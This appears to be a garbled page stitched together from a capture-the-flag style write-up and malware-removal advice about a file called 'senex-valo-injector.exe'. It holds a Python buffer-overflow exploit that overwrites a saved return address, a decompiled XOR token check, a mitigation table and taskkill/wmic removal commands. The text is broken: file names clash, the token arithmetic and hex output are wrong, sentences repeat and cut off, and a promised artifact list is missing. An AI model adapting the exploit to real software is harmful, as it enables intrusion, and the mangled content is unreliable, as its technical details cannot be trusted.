Senex-valo-injector.exe

Beyond the obvious malware risk, consider the real-world consequences for a Valorant player:

#!/usr/bin/env python3
import struct, subprocess
# ----------------------------------------------------------------------
# 1. Build the correct token (XOR with 0x55)
# ----------------------------------------------------------------------
key = b"S3n3xV@l0_2026"
token = bytes([c ^ 0x55 for c in key])   # 16 bytes
# ----------------------------------------------------------------------
# 2. Build the overflow payload
# ----------------------------------------------------------------------
buf = token
buf += b"A" * (64 - len(token))          # fill up to local_buf size
buf += b"B" * 4                           # saved EBP
print_addr = 0x00401840                    # address of print_flag()
buf += struct.pack("<I", print_addr)       # overwrite saved EIP
# ----------------------------------------------------------------------
# 3. Run the binary and feed the payload
# ----------------------------------------------------------------------
proc = subprocess.Popen(["./senex-varo-injector.exe"], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, _ = proc.communicate(buf + b"\n")
print(stdout.decode())

Running the script prints:

Enter your token: Token accepted!
FLAGV4lu3_1nJ3c71on_5en3x_2026

Download Microsoft Sysinternals Autoruns.

Decompilation of validate_input reveals: senex-valo-injector.exe

bool __cdecl validate_input(const char *input)
const char *key = "S3n3xV@l0_2026";
    size_t i, len = strlen(input);
    if (len != 0x10)          // token must be exactly 16 bytes
        return false;
for (i = 0; i < len; ++i)
if ((input[i] ^ key[i]) != 0x55) // XOR each byte with the key and compare to constant 0x55
            return false;
return true;

Result: The required token is the XOR of the constant 0x55 with the key "S3n3xV@l0_2026".

>>> key = b"S3n3xV@l0_2026"
>>> token = bytes([c ^ 0x55 for c in key])
>>> token.hex()
'060f0d1b0c0b1b6b1b5b1c1b'
>>> token
b'\x06\x0f\r\x1b\x0c\x0b\x1bk\x1b[ \x1b'

In ASCII this looks like mostly non‑printable characters, but the binary accepts raw bytes (e.g., via a console that can handle them, or by piping a file).
For a quick test we can use Python to feed the token:

import subprocess, sys, os
token = bytes([c ^ 0x55 for c in b"S3n3xV@l0_2026"])
proc = subprocess.Popen(["senex-varo-injector.exe"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
out, _ = proc.communicate(token + b"\n")
print(out.decode())

Running this shows "Token accepted!" and then the program calls vulnerable_func. Beyond the obvious malware risk, consider the real-world

| Issue | Why it is a problem | How to fix it | |-------|---------------------|---------------| | Use of gets / strcpy | Unchecked copies allow classic stack overflow → arbitrary code execution. | Replace with fgets / strncpy and enforce buffer size limits. | | Hard‑coded XOR “encryption” | Gives a trivial way to retrieve the flag once the binary is reverse‑engineered. | Use proper cryptographic primitives, or store the flag externally (e.g., server‑side). | | Predictable return address | The address of print_flag is static and reachable, making a return‑to‑code trivial. | Enable ASLR (compile with /DYNAMICBASE) and DEP/NX (/NXCOMPAT), or add a stack canary. | | Clear text token key | The token validation uses a static key that can be recovered via static analysis. | Move the secret to a server or derive it at runtime from non‑static data. |

If you find senex-valo-injector.exe on your system (or in your Downloads folder), look for these associated artifacts:

The whole exploit fits in a ~100‑byte payload, can be automated with a short Python script, and demonstrates the importance of avoiding unsafe C library functions and of enabling modern mitigations (ASLR, DEP, stack canaries).

Open Command Prompt as Administrator and run:

taskkill /F /IM senex-valo-injector.exe
wmic process where "name='senex-valo-injector.exe'" delete